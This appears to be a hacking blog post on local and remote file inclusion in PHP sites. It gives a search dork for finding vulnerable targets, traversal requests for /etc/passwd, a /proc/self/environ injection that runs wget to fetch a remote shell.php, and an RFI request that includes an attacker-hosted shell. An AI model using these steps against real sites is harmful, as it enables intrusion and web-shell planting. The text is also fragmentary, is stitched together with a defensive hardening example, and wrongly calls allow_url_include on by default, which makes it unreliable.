LFI & RFI

LFI and RFI are website hacking vulnerabilities.

LFI - Local File Inclusion

It causes a file on the server to be included and displayed in our browser.

To see if a script is vulnerable to local file inclusion, request:

index.php?page=../../../../../../../../../etc/passwd


That shows the complete user information on that server, with paths.

Here ../ causes the script to move up one directory. Multiple ../ cause the script to move to the top-level directory (/, the root of the filesystem), and /etc/passwd is the Unix passwd file.

google dork: inurl:.php?page=


example: www.xxx.com/contacts.php?page=abc.php


test: www.xxx.com/contacts.php?page=../xyz.php


Now, on a Linux server there is /etc/passwd.


1... www.xyz.com/index

../

=../../../etc/passwd



etc/passwd file (google)

/proc/self/environ is a file that is writable by the end user,

or /var/log/httpd-access.log, which is also writable.


proc/self/environ

Add-on: User Agent Switcher


config.php

../proc/self//environ&cmd=wget http://

t35.com/abc.txt O shell.php


config.php

ip

username

pwd


Done..



RFI - Remote file inclusion

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity it can also lead to, to list a few:

   -> Code execution on the web server

   -> Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)

   -> Denial of Service (DoS)

   -> Data theft/manipulation

By default allow_url_include is ON in php.ini

www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
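
Both the LFI and the RFI requests above work only when the page parameter reaches include without validation. The following is an added example, not code from the original post, showing that pattern next to a hardened version; the file name contacts.php, the pages/ directory and the page names are assumptions.

```php
<?php
// Added example (hypothetical contacts.php). The pages/ directory and the
// entries in PAGES are assumptions made for illustration.

// VULNERABLE pattern, shown for contrast only:
//   include $_GET['page'];
// The parameter reaches include unchecked, so ../ sequences (LFI) or, when
// allow_url_include is enabled, an http:// URL (RFI) choose the file loaded.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file on disk. Nothing taken from the request
// is ever concatenated into a path.
const PAGES = [
    'abc'     => 'abc.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null; // unknown name: ../, absolute paths and URLs all end here
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and stay inside
    // PAGE_DIR even if an allowlisted entry is a symlink.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'contact';
// page[]=x arrives as an array, so check the type before the lookup.
$file = is_string($page) ? resolve_page($page) : null;
if ($file === null) {
    http_response_code(404);
    // json_encode keeps newlines in the value from forging extra log lines.
    error_log('rejected page parameter: ' . json_encode($page));
    exit('Not found');
}
include $file;
```

Setting allow_url_include = Off in php.ini additionally stops include from fetching http:// URLs, and the rejected-parameter log line gives defenders something to alert on.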
LFI & RFI Reviewed by Unknown on 1/20/2015 Rating: 5